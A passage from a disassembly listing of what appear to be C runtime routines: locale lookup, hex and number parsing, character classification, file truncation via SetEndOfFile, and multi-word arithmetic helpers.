; ---------------------------------------------------------------------------
loc_435A86: ; CODE XREF: sub_4359D0+6A�j
mov ecx, [ebp+var_C]
imul ecx, 2Ch
add ecx, offset off_4545C0
mov [ebp+var_8], ecx
jmp short loc_435AD8
; ---------------------------------------------------------------------------
loc_435A97: ; CODE XREF: sub_4359D0+87�j
mov edx, [ebp+var_C]
imul edx, 2Ch
mov eax, ds:off_4545C4[edx]
mov [ebp+var_8], eax
jmp short loc_435AD8
; ---------------------------------------------------------------------------
loc_435AA8: ; CODE XREF: sub_4359D0+70�j
mov ecx, [ebp+var_C]
imul ecx, 2Ch
add ecx, offset off_4545C8
mov [ebp+var_8], ecx
jmp short loc_435AD8
; ---------------------------------------------------------------------------
loc_435AB9: ; CODE XREF: sub_4359D0+5A�j
mov edx, [ebp+var_C]
imul edx, 2Ch
add edx, offset dword_4545CC
mov [ebp+var_8], edx
jmp short loc_435AD8
; ---------------------------------------------------------------------------
loc_435ACA: ; CODE XREF: sub_4359D0+90�j
mov eax, [ebp+var_C]
imul eax, 2Ch
add eax, offset a1252 ; "1252"
mov [ebp+var_8], eax
loc_435AD8: ; CODE XREF: sub_4359D0+72�j
; sub_4359D0+92�j ...
cmp [ebp+var_8], 0
jz short loc_435AE4
cmp [ebp+arg_C], 1
jge short loc_435AE6
loc_435AE4: ; CODE XREF: sub_4359D0+10C�j
jmp short loc_435B38
; ---------------------------------------------------------------------------
loc_435AE6: ; CODE XREF: sub_4359D0+112�j
mov ecx, [ebp+arg_C]
sub ecx, 1
push ecx
mov edx, [ebp+var_8]
push edx
mov eax, [ebp+arg_8]
push eax
call sub_41E510
add esp, 0Ch
mov ecx, [ebp+arg_8]
add ecx, [ebp+arg_C]
mov byte ptr [ecx-1], 0
mov eax, 1
jmp short loc_435B4E
; ---------------------------------------------------------------------------
loc_435B0E: ; CODE XREF: sub_4359D0+44�j
mov edx, [ebp+var_C]
imul edx, 2Ch
mov eax, [ebp+arg_0]
cmp eax, ds:dword_4545B0[edx]
jnb short loc_435B2A
mov ecx, [ebp+var_C]
sub ecx, 1
mov [ebp+var_4], ecx
jmp short loc_435B33
; ---------------------------------------------------------------------------
loc_435B2A: ; CODE XREF: sub_4359D0+14D�j
mov edx, [ebp+var_C]
add edx, 1
mov [ebp+var_10], edx
loc_435B33: ; CODE XREF: sub_4359D0+158�j
jmp loc_4359EB
; ---------------------------------------------------------------------------
loc_435B38: ; CODE XREF: sub_4359D0+21�j
; sub_4359D0:loc_435AE4�j
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call ds:dword_4F5398 ; GetLocaleInfoA
loc_435B4E: ; CODE XREF: sub_4359D0+13C�j
mov esp, ebp
pop ebp
retn 10h
sub_4359D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_435B60 proc near ; CODE XREF: sub_435200+A�p
; sub_4355B0+A�p ...
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_4], 0
loc_435B6D: ; CODE XREF: sub_435B60+6D�j
mov eax, [ebp+arg_0]
mov cl, [eax]
mov [ebp+var_8], cl
movsx edx, [ebp+var_8]
mov eax, [ebp+arg_0]
add eax, 1
mov [ebp+arg_0], eax
test edx, edx
jz short loc_435BCF
movsx ecx, [ebp+var_8]
cmp ecx, 61h
jl short loc_435BA2
movsx edx, [ebp+var_8]
cmp edx, 66h
jg short loc_435BA2
mov al, [ebp+var_8]
add al, 0D9h
mov [ebp+var_8], al
jmp short loc_435BBC
; ---------------------------------------------------------------------------
loc_435BA2: ; CODE XREF: sub_435B60+2D�j
; sub_435B60+36�j
movsx ecx, [ebp+var_8]
cmp ecx, 41h
jl short loc_435BBC
movsx edx, [ebp+var_8]
cmp edx, 46h
jg short loc_435BBC
mov al, [ebp+var_8]
add al, 0F9h
mov [ebp+var_8], al
loc_435BBC: ; CODE XREF: sub_435B60+40�j
; sub_435B60+49�j ...
mov ecx, [ebp+var_4]
shl ecx, 4
movsx edx, [ebp+var_8]
lea eax, [ecx+edx-30h]
mov [ebp+var_4], eax
jmp short loc_435B6D
; ---------------------------------------------------------------------------
loc_435BCF: ; CODE XREF: sub_435B60+24�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_435B60 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_435BE0 proc near ; CODE XREF: sub_435140+60�p
; sub_435530+39�p ...
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_8], 0
mov eax, [ebp+arg_0]
mov cl, [eax]
mov [ebp+var_4], cl
mov edx, [ebp+arg_0]
add edx, 1
mov [ebp+arg_0], edx
loc_435BFE: ; CODE XREF: sub_435BE0+5C�j
movsx eax, [ebp+var_4]
cmp eax, 41h
jl short loc_435C10
movsx ecx, [ebp+var_4]
cmp ecx, 5Ah
jle short loc_435C22
loc_435C10: ; CODE XREF: sub_435BE0+25�j
movsx edx, [ebp+var_4]
cmp edx, 61h
jl short loc_435C3E
movsx eax, [ebp+var_4]
cmp eax, 7Ah
jg short loc_435C3E
loc_435C22: ; CODE XREF: sub_435BE0+2E�j
mov ecx, [ebp+var_8]
add ecx, 1
mov [ebp+var_8], ecx
mov edx, [ebp+arg_0]
mov al, [edx]
mov [ebp+var_4], al
mov ecx, [ebp+arg_0]
add ecx, 1
mov [ebp+arg_0], ecx
jmp short loc_435BFE
; ---------------------------------------------------------------------------
loc_435C3E: ; CODE XREF: sub_435BE0+37�j
; sub_435BE0+40�j
mov eax, [ebp+var_8]
mov esp, ebp
pop ebp
retn
sub_435BE0 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push 1
push 0
mov eax, [ebp+8]
push eax
call sub_435DD0
add esp, 0Ch
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push 3
push 0
mov eax, [ebp+8]
push eax
call sub_435DD0
add esp, 0Ch
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push 2
push 0
mov eax, [ebp+8]
push eax
call sub_435DD0
add esp, 0Ch
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push 1
push 107h
mov eax, [ebp+8]
push eax
call sub_435DD0
add esp, 0Ch
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push 1
push 103h
mov eax, [ebp+8]
push eax
call sub_435DD0
add esp, 0Ch
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push 3
push 117h
mov eax, [ebp+8]
push eax
call sub_435DD0
add esp, 0Ch
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push 3
push 157h
mov eax, [ebp+8]
push eax
call sub_435DD0
add esp, 0Ch
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push 2
push 10h
mov eax, [ebp+8]
push eax
call sub_435DD0
add esp, 0Ch
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_435D50 proc near ; CODE XREF: sub_42F1D0+4E�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 4
push 0
mov eax, [ebp+arg_0]
push eax
call sub_435DD0
add esp, 0Ch
pop ebp
retn
sub_435D50 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push 8
push 0
mov eax, [ebp+8]
push eax
call sub_435DD0
add esp, 0Ch
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
cmp ds:dword_4F37CC, 3A4h
jnz short loc_435DBD
push 3
push 0
mov eax, [ebp+8]
push eax
call sub_435DD0
add esp, 0Ch
test eax, eax
jz short loc_435DBD
mov dword ptr [ebp-4], 1
jmp short loc_435DC4
; ---------------------------------------------------------------------------
loc_435DBD: ; CODE XREF: _0:00435D9E�j _0:00435DB2�j
mov dword ptr [ebp-4], 0
loc_435DC4: ; CODE XREF: _0:00435DBB�j
mov eax, [ebp-4]
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_435DD0 proc near ; CODE XREF: _0:00435C5B�p _0:00435C7B�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
mov eax, [ebp+arg_0]
and eax, 0FFh
mov [ebp+arg_0], eax
mov ecx, [ebp+arg_0]
xor edx, edx
mov dl, ds:byte_4F38E1[ecx]
and edx, [ebp+arg_8]
test edx, edx
jnz short loc_435E24
cmp [ebp+arg_4], 0
jz short loc_435E0E
mov eax, [ebp+arg_0]
xor ecx, ecx
mov cx, ds:word_453BEE[eax*2]
and ecx, [ebp+arg_4]
mov [ebp+var_4], ecx
jmp short loc_435E15
; ---------------------------------------------------------------------------
loc_435E0E: ; CODE XREF: sub_435DD0+27�j
mov [ebp+var_4], 0
loc_435E15: ; CODE XREF: sub_435DD0+3C�j
cmp [ebp+var_4], 0
jnz short loc_435E24
mov [ebp+var_8], 0
jmp short loc_435E2B
; ---------------------------------------------------------------------------
loc_435E24: ; CODE XREF: sub_435DD0+21�j
; sub_435DD0+49�j
mov [ebp+var_8], 1
loc_435E2B: ; CODE XREF: sub_435DD0+52�j
mov eax, [ebp+var_8]
mov esp, ebp
pop ebp
retn
sub_435DD0 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+8]
cmp eax, ds:dword_4F37C0
jnb short loc_435E71
mov ecx, [ebp+8]
sar ecx, 5
mov edx, [ebp+8]
and edx, 1Fh
imul edx, 24h
mov eax, ds:dword_4F36C0[ecx*4]
movsx ecx, byte ptr [eax+edx+4]
and ecx, 1
test ecx, ecx
jnz short loc_435E81
loc_435E71: ; CODE XREF: _0:00435E4D�j
call sub_429A90
mov dword ptr [eax], 9
or eax, 0FFFFFFFFh
jmp short loc_435EAF
; ---------------------------------------------------------------------------
loc_435E81: ; CODE XREF: _0:00435E6F�j
mov edx, [ebp+8]
push edx
call sub_431070
add esp, 4
mov eax, [ebp+0Ch]
push eax
mov ecx, [ebp+8]
push ecx
call sub_435EC0
add esp, 8
mov [ebp-4], eax
mov edx, [ebp+8]
push edx
call sub_431100
add esp, 4
mov eax, [ebp-4]
loc_435EAF: ; CODE XREF: _0:00435E7F�j
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_435EC0 proc near ; CODE XREF: sub_4314E0+44C�p
; _0:00435E95�p
var_1024 = dword ptr -1024h
var_1020 = dword ptr -1020h
var_101C = dword ptr -101Ch
var_1018 = dword ptr -1018h
var_1014 = dword ptr -1014h
var_1010 = dword ptr -1010h
var_100C = dword ptr -100Ch
var_1008 = dword ptr -1008h
var_1004 = byte ptr -1004h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 1024h
call sub_41EF80
push ebx
push esi
push edi
lea eax, [ebp+var_1004]
mov [ebp+var_1014], eax
mov [ebp+var_101C], 0
loc_435EE6: ; CODE XREF: sub_435EC0+51�j
cmp [ebp+arg_4], 0
jge short loc_435F0D
push offset dword_43DEDC
push 0
push 81h
push offset dword_43DED0
push 2
call sub_422610
add esp, 14h
cmp eax, 1
jnz short loc_435F0D
int 3 ; Trap to Debugger
loc_435F0D: ; CODE XREF: sub_435EC0+2A�j
; sub_435EC0+4A�j
xor ecx, ecx
test ecx, ecx
jnz short loc_435EE6
push 1
push 0
mov edx, [ebp+arg_0]
push edx
call sub_42E570
add esp, 0Ch
mov [ebp+var_100C], eax
cmp [ebp+var_100C], 0FFFFFFFFh
jz short loc_435F51
push 2
push 0
mov eax, [ebp+arg_0]
push eax
call sub_42E570
add esp, 0Ch
mov [ebp+var_1010], eax
cmp [ebp+var_1010], 0FFFFFFFFh
jnz short loc_435F59
loc_435F51: ; CODE XREF: sub_435EC0+70�j
or eax, 0FFFFFFFFh
jmp loc_4360E9
; ---------------------------------------------------------------------------
loc_435F59: ; CODE XREF: sub_435EC0+8F�j
mov ecx, [ebp+arg_4]
sub ecx, [ebp+var_1010]
mov [ebp+var_1018], ecx
cmp [ebp+var_1018], 0
jle loc_436070
push 1000h
push 0
mov edx, [ebp+var_1014]
push edx
call sub_41E4B0
add esp, 0Ch
push 8000h
mov eax, [ebp+arg_0]
push eax
call sub_4390A0
add esp, 8
mov [ebp+var_4], eax
loc_435F9F: ; CODE XREF: sub_435EC0+198�j
cmp [ebp+var_1018], 1000h
jl short loc_435FB7
mov [ebp+var_1020], 1000h
jmp short loc_435FC3
; ---------------------------------------------------------------------------
loc_435FB7: ; CODE XREF: sub_435EC0+E9�j
mov ecx, [ebp+var_1018]
mov [ebp+var_1020], ecx
loc_435FC3: ; CODE XREF: sub_435EC0+F5�j
mov edx, [ebp+var_1020]
mov [ebp+var_1008], edx
cmp [ebp+var_1018], 1000h
jl short loc_435FE7
mov [ebp+var_1024], 1000h
jmp short loc_435FF3
; ---------------------------------------------------------------------------
loc_435FE7: ; CODE XREF: sub_435EC0+119�j
mov eax, [ebp+var_1018]
mov [ebp+var_1024], eax
loc_435FF3: ; CODE XREF: sub_435EC0+125�j
mov ecx, [ebp+var_1024]
push ecx
mov edx, [ebp+var_1014]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_42E9D0
add esp, 0Ch
mov [ebp+var_1008], eax
cmp [ebp+var_1008], 0FFFFFFFFh
jnz short loc_43603F
call sub_429AA0
cmp dword ptr [eax], 5
jnz short loc_436031
call sub_429A90
mov dword ptr [eax], 0Dh
loc_436031: ; CODE XREF: sub_435EC0+164�j
mov ecx, [ebp+var_1008]
mov [ebp+var_101C], ecx
jmp short loc_43605E
; ---------------------------------------------------------------------------
loc_43603F: ; CODE XREF: sub_435EC0+15A�j
mov edx, [ebp+var_1018]
sub edx, [ebp+var_1008]
mov [ebp+var_1018], edx
cmp [ebp+var_1018], 0
jg loc_435F9F
loc_43605E: ; CODE XREF: sub_435EC0+17D�j
mov eax, [ebp+var_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_4390A0
add esp, 8
jmp short loc_4360CE
; ---------------------------------------------------------------------------
loc_436070: ; CODE XREF: sub_435EC0+AF�j
cmp [ebp+var_1018], 0
jge short loc_4360CE
push 0
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_42E570
add esp, 0Ch
mov ecx, [ebp+arg_0]
push ecx
call sub_430EF0
add esp, 4
push eax
call ds:dword_4F52E8 ; SetEndOfFile
neg eax
sbb eax, eax
neg eax
dec eax
mov [ebp+var_101C], eax
cmp [ebp+var_101C], 0FFFFFFFFh
jnz short loc_4360CE
call sub_429A90
mov dword ptr [eax], 0Dh
call ds:dword_4F5360 ; RtlGetLastWin32Error
mov esi, eax
call sub_429AA0
mov [eax], esi
loc_4360CE: ; CODE XREF: sub_435EC0+1AE�j
; sub_435EC0+1B7�j ...
push 0
mov edx, [ebp+var_100C]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_42E570
add esp, 0Ch
mov eax, [ebp+var_101C]
loc_4360E9: ; CODE XREF: sub_435EC0+94�j
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_435EC0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4360F0 proc near ; CODE XREF: sub_432490+53�p
; sub_432490+94�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_8], 0
mov eax, [ebp+arg_0]
add eax, [ebp+arg_4]
mov [ebp+var_4], eax
mov ecx, [ebp+var_4]
cmp ecx, [ebp+arg_0]
jb short loc_436116
mov edx, [ebp+var_4]
cmp edx, [ebp+arg_4]
jnb short loc_43611F
loc_436116: ; CODE XREF: sub_4360F0+1C�j
mov eax, [ebp+var_8]
add eax, 1
mov [ebp+var_8], eax
loc_43611F: ; CODE XREF: sub_4360F0+24�j
mov ecx, [ebp+arg_8]
mov edx, [ebp+var_4]
mov [ecx], edx
mov eax, [ebp+var_8]
mov esp, ebp
pop ebp
retn
sub_4360F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_436130 proc near ; CODE XREF: sub_4362B0+77�p
; sub_4362B0+AA�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_0]
push eax
mov ecx, [ebp+arg_4]
mov edx, [ecx]
push edx
mov eax, [ebp+arg_0]
mov ecx, [eax]
push ecx
call sub_4360F0
add esp, 0Ch
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_436187
mov edx, [ebp+arg_0]
add edx, 4
push edx
push 1
mov eax, [ebp+arg_0]
mov ecx, [eax+4]
push ecx
call sub_4360F0
add esp, 0Ch
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_436187
mov edx, [ebp+arg_0]
mov eax, [edx+8]
add eax, 1
mov ecx, [ebp+arg_0]
mov [ecx+8], eax
loc_436187: ; CODE XREF: sub_436130+25�j
; sub_436130+46�j
mov edx, [ebp+arg_0]
add edx, 4
push edx
mov eax, [ebp+arg_4]
mov ecx, [eax+4]
push ecx
mov edx, [ebp+arg_0]
mov eax, [edx+4]
push eax
call sub_4360F0
add esp, 0Ch
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jz short loc_4361BC
mov ecx, [ebp+arg_0]
mov edx, [ecx+8]
add edx, 1
mov eax, [ebp+arg_0]
mov [eax+8], edx
loc_4361BC: ; CODE XREF: sub_436130+7B�j
mov ecx, [ebp+arg_0]
add ecx, 8
push ecx
mov edx, [ebp+arg_4]
mov eax, [edx+8]
push eax
mov ecx, [ebp+arg_0]
mov edx, [ecx+8]
push edx
call sub_4360F0
add esp, 0Ch
mov esp, ebp
pop ebp
retn
sub_436130 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4361E0 proc near ; CODE XREF: sub_4362B0+5B�p
; sub_4362B0+67�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 8
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, 80000000h
neg ecx
sbb ecx, ecx
neg ecx
mov [ebp+var_4], ecx
mov edx, [ebp+arg_0]
mov eax, [edx+4]
and eax, 80000000h
neg eax
sbb eax, eax
neg eax
mov [ebp+var_8], eax
mov ecx, [ebp+arg_0]
mov edx, [ecx]
shl edx, 1
mov eax, [ebp+arg_0]
mov [eax], edx
mov ecx, [ebp+arg_0]
mov edx, [ecx+4]
shl edx, 1
or edx, [ebp+var_4]
mov eax, [ebp+arg_0]
mov [eax+4], edx
mov ecx, [ebp+arg_0]
mov edx, [ecx+8]
shl edx, 1
or edx, [ebp+var_8]
mov eax, [ebp+arg_0]
mov [eax+8], edx
mov esp, ebp
pop ebp
retn
sub_4361E0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_436240 proc near ; CODE XREF: sub_436F70+382�p
; sub_439170+316�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 8
mov eax, [ebp+arg_0]
mov ecx, [eax+8]
and ecx, 1
neg ecx
sbb ecx, ecx
and ecx, 80000000h
mov [ebp+var_8], ecx
mov edx, [ebp+arg_0]
mov eax, [edx+4]
and eax, 1
neg eax
sbb eax, eax
and eax, 80000000h
mov [ebp+var_4], eax
mov ecx, [ebp+arg_0]
mov edx, [ecx+8]
shr edx, 1
mov eax, [ebp+arg_0]
mov [eax+8], edx
mov ecx, [ebp+arg_0]
mov edx, [ecx+4]
shr edx, 1
or edx, [ebp+var_8]
mov eax, [ebp+arg_0]
mov [eax+4], edx
mov ecx, [ebp+arg_0]
mov edx, [ecx]
shr edx, 1
or edx, [ebp+var_4]
mov eax, [ebp+arg_0]
mov [eax], edx
mov esp, ebp
pop ebp
retn
sub_436240 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4362B0 proc near ; CODE XREF: sub_4363F0+8A7�p
var_10 = word ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
mov [ebp+var_10], 404Eh
mov eax, [ebp+arg_8]
mov dword ptr [eax], 0
mov ecx, [ebp+arg_8]
mov dword ptr [ecx+4], 0
mov edx, [ebp+arg_8]
mov dword ptr [edx+8], 0
jmp short loc_4362ED
; ---------------------------------------------------------------------------
loc_4362DB: ; CODE XREF: sub_4362B0+B2�j
mov eax, [ebp+arg_4]
sub eax, 1
mov [ebp+arg_4], eax
mov ecx, [ebp+arg_0]
add ecx, 1
mov [ebp+arg_0], ecx
loc_4362ED: ; CODE XREF: sub_4362B0+29�j
cmp [ebp+arg_4], 0
jbe short loc_436367
mov edx, [ebp+arg_8]
mov eax, [edx]
mov [ebp+var_C], eax
mov ecx, [edx+4]
mov [ebp+var_8], ecx
mov edx, [edx+8]
mov [ebp+var_4], edx
mov eax, [ebp+arg_8]
push eax
call sub_4361E0
add esp, 4
mov ecx, [ebp+arg_8]
push ecx
call sub_4361E0
add esp, 4
lea edx, [ebp+var_C]
push edx
mov eax, [ebp+arg_8]
push eax
call sub_436130
add esp, 8
mov ecx, [ebp+arg_8]
push ecx
call sub_4361E0
add esp, 4
mov edx, [ebp+arg_0]
movsx eax, byte ptr [edx]
mov [ebp+var_C], eax
mov [ebp+var_8], 0
mov [ebp+var_4], 0
lea ecx, [ebp+var_C]
push ecx
mov edx, [ebp+arg_8]
push edx
call sub_436130
add esp, 8
jmp loc_4362DB
; ---------------------------------------------------------------------------
loc_436367: ; CODE XREF: sub_4362B0+41�j
; sub_4362B0+101�j
mov eax, [ebp+arg_8]
cmp dword ptr [eax+8], 0
jnz short loc_4363B3
mov ecx, [ebp+arg_8]
mov edx, [ecx+4]
shr edx, 10h
mov eax, [ebp+arg_8]
mov [eax+8], edx
mov ecx, [ebp+arg_8]
mov edx, [ecx+4]
shl edx, 10h
mov eax, [ebp+arg_8]
mov ecx, [eax]
shr ecx, 10h
or edx, ecx
mov eax, [ebp+arg_8]
mov [eax+4], edx
mov ecx, [ebp+arg_8]
mov edx, [ecx]
shl edx, 10h
mov eax, [ebp+arg_8]
mov [eax], edx
mov cx, [ebp+var_10]
sub cx, 10h
mov [ebp+var_10], cx
jmp short loc_436367
; ---------------------------------------------------------------------------
loc_4363B3: ; CODE XREF: sub_4362B0+BE�j
; sub_4362B0+12A�j
mov edx, [ebp+arg_8]
mov eax, [edx+8]
and eax, 8000h
test eax, eax
jnz short loc_4363DC
mov ecx, [ebp+arg_8]
push ecx
call sub_4361E0
add esp, 4
mov dx, [ebp+var_10]
sub dx, 1
mov [ebp+var_10], dx
jmp short loc_4363B3
; ---------------------------------------------------------------------------
loc_4363DC: ; CODE XREF: sub_4362B0+110�j
mov eax, [ebp+arg_8]
mov cx, [ebp+var_10]
mov [eax+0Ah], cx
mov esp, ebp
pop ebp
retn
sub_4362B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4363F0 proc near ; CODE XREF: sub_432B20+1A�p
; _0:00432B7A�p ...
var_B4 = byte ptr -0B4h
var_B0 = dword ptr -0B0h
var_AC = dword ptr -0ACh
var_A8 = byte ptr -0A8h
var_A4 = byte ptr -0A4h
var_A0 = dword ptr -0A0h
var_9C = dword ptr -9Ch
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = byte ptr -8Ch
var_88 = dword ptr -88h
var_84 = byte ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = word ptr -60h
var_5E = dword ptr -5Eh
var_5A = dword ptr -5Ah
var_56 = word ptr -56h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = word ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = byte ptr -38h
var_21 = byte ptr -21h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 0B4h
lea eax, [ebp+var_38]
mov [ebp+var_68], eax
mov word ptr [ebp+var_1C], 0
mov [ebp+var_74], 1
mov [ebp+var_70], 0
mov [ebp+var_54], 0
mov [ebp+var_C], 0
mov [ebp+var_18], 0
mov [ebp+var_40], 0
mov [ebp+var_78], 0
mov [ebp+var_14], 0
mov [ebp+var_6C], 0
mov [ebp+var_44], 0
mov [ebp+var_4C], 0
mov ecx, [ebp+arg_8]
mov [ebp+var_4], ecx
mov edx, [ebp+var_4]
mov [ebp+var_64], edx
jmp short loc_436469
; ---------------------------------------------------------------------------
loc_436460: ; CODE XREF: sub_4363F0:loc_436495�j
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
loc_436469: ; CODE XREF: sub_4363F0+6E�j
mov ecx, [ebp+var_4]
movsx edx, byte ptr [ecx]
cmp edx, 20h
jz short loc_436495
mov eax, [ebp+var_4]
movsx ecx, byte ptr [eax]
cmp ecx, 9
jz short loc_436495
mov edx, [ebp+var_4]
movsx eax, byte ptr [edx]
cmp eax, 0Ah
jz short loc_436495
mov ecx, [ebp+var_4]
movsx edx, byte ptr [ecx]
cmp edx, 0Dh
jnz short loc_436497
loc_436495: ; CODE XREF: sub_4363F0+82�j
; sub_4363F0+8D�j ...
jmp short loc_436460
; ---------------------------------------------------------------------------
loc_436497: ; CODE XREF: sub_4363F0+A3�j
; sub_4363F0:loc_436BF3�j
cmp [ebp+var_4C], 0Ah
jz loc_436BF8
mov eax, [ebp+var_4]
mov cl, [eax]
mov byte ptr [ebp+var_3C], cl
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
mov eax, [ebp+var_4C]
mov [ebp+var_80], eax
cmp [ebp+var_80], 0Bh
ja loc_436BF3
mov ecx, [ebp+var_80]
jmp off_436E0A[ecx*4]
loc_4364CC: ; DATA XREF: _0:off_436E0A�o
movsx edx, byte ptr [ebp+var_3C]
cmp edx, 31h
jl short loc_4364F0
movsx eax, byte ptr [ebp+var_3C]
cmp eax, 39h
jg short loc_4364F0
mov [ebp+var_4C], 3
mov ecx, [ebp+var_4]
sub ecx, 1
mov [ebp+var_4], ecx
jmp short loc_436565
; ---------------------------------------------------------------------------
loc_4364F0: ; CODE XREF: sub_4363F0+E3�j
; sub_4363F0+EC�j
movsx edx, byte ptr [ebp+var_3C]
movsx eax, ds:byte_453DF4
cmp edx, eax
jnz short loc_436508
mov [ebp+var_4C], 5
jmp short loc_436565
; ---------------------------------------------------------------------------
loc_436508: ; CODE XREF: sub_4363F0+10D�j
mov cl, byte ptr [ebp+var_3C]
mov [ebp+var_84], cl
cmp [ebp+var_84], 2Bh
jz short loc_436537
cmp [ebp+var_84], 2Dh
jz short loc_436546
cmp [ebp+var_84], 30h
jz short loc_43652E
jmp short loc_436555
; ---------------------------------------------------------------------------
loc_43652E: ; CODE XREF: sub_4363F0+13A�j
mov [ebp+var_4C], 1
jmp short loc_436565
; ---------------------------------------------------------------------------
loc_436537: ; CODE XREF: sub_4363F0+128�j
mov [ebp+var_4C], 2
mov word ptr [ebp+var_1C], 0
jmp short loc_436565
; ---------------------------------------------------------------------------
loc_436546: ; CODE XREF: sub_4363F0+131�j
mov [ebp+var_4C], 2
mov word ptr [ebp+var_1C], 8000h
jmp short loc_436565
; ---------------------------------------------------------------------------
loc_436555: ; CODE XREF: sub_4363F0+13C�j
mov [ebp+var_4C], 0Ah
mov edx, [ebp+var_4]
sub edx, 1
mov [ebp+var_4], edx
loc_436565: ; CODE XREF: sub_4363F0+FE�j
; sub_4363F0+116�j ...
jmp loc_436BF3
; ---------------------------------------------------------------------------
loc_43656A: ; CODE XREF: sub_4363F0+D5�j
; DATA XREF: _0:00436E0E�o
mov [ebp+var_54], 1
movsx eax, byte ptr [ebp+var_3C]
cmp eax, 31h
jl short loc_436598
movsx ecx, byte ptr [ebp+var_3C]
cmp ecx, 39h
jg short loc_436598
mov [ebp+var_4C], 3
mov edx, [ebp+var_4]
sub edx, 1
mov [ebp+var_4], edx
jmp loc_43661B
; ---------------------------------------------------------------------------
